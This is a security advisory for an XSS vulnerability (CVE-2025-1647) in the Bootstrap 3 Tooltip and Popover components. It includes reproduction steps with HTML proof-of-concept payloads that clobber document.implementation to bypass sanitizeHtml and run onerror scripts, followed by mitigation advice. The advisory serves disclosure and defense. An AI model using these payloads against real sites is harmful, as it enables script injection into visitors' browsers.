Overview
Bootstrap is an HTML, CSS, and JS framework for developing responsive, mobile-first web sites and applications.
A cross-site scripting (XSS) vulnerability (CVE-2025-1647) has been identified within the Bootstrap 3 Popover component and Bootstrap 3 Tooltip component, which allows unsanitized HTML to be used.
Per OWASP: Cross-Site Scripting attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. An attacker can use XSS to send a malicious script to an unsuspecting user.
This issue affects Bootstrap versions greater than or equal to 3.4.1 and less than 4.0.0.
Details
Module Info
- Product: Bootstrap
- Affected packages: bootstrap
- Affected versions: >=3.4.1 <4.0.0
- GitHub repository: https://github.com/twbs/bootstrap
- Published packages: https://npmjs.com/package/bootstrap
- Package manager: npm
- Fixed in: Bootstrap NES v3.4.7
Vulnerability Info
This Medium-severity vulnerability is found in the Popover and Tooltip components of Bootstrap in versions greater than or equal to 3.4.1 and less than 4.0.0.
DOM-based cross-site scripting (XSS) via DOM clobbering occurs when an attacker manipulates the Document Object Model (DOM) to overwrite or "clobber" an existing DOM object, leading to the execution of malicious scripts. This technique takes advantage of the browser's handling of DOM elements and can occur entirely on the client side, bypassing traditional XSS protections on the server. In this case, there is a function in Bootstrap, sanitizeHtml, that can be forced to skip the sanitization if the createHTMLDocument method is clobbered.
Steps to Reproduce
1. Create an HTML page that is set up to use Bootstrap v3.4.1.
2. Add an image tag that will clobber document.implementation by giving the name attribute the value implementation. For example:
<img name="implementation" src="clobbered" />
3. Add a button tag that has data-toggle="tooltip" and data-html="true". In the title attribute, give it the value <img src=x onerror=alert('unsanitized tooltip')>. For example:
<button
id="button1"
data-toggle="tooltip"
data-html="true"
title="<img src=x onerror=alert('unsanitized tooltip')>"
>Click Me</button>
<script>
$(document).ready(function () {
$('#button1').tooltip();
});
</script>
4. Alternatively, you can add a button tag that has data-toggle="popover" and data-html="true". In the title attribute, give it the value <img src=y onerror=alert('unsanitized popover title')> and in the data-content attribute, give it the value <img src=z onerror=alert('unsanitized popover data')>. For example:
<button
id="button2"
data-toggle="popover"
data-html="true"
title="<img src=y onerror=alert('unsanitized popover title')>"
data-content="<img src=z onerror=alert('unsanitized popover data')>"
>Click Me</button>
<script>
$(document).ready(function () {
$('#button2').popover();
});
</script>
Proof of Concept
A full reproduction with code similar to the above can be found here:
XSS using DOM Clobbering during HTML sanitization PoC
Credits
- Johan Carlsson (joaxcar) (finder)
Mitigation
The Bootstrap 3 version is End-of-Life and will not receive any updates to address this issue. For more information see here.
Users of the affected components should apply one of the following mitigations:
- Migrate affected applications to a supported version of Bootstrap.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.
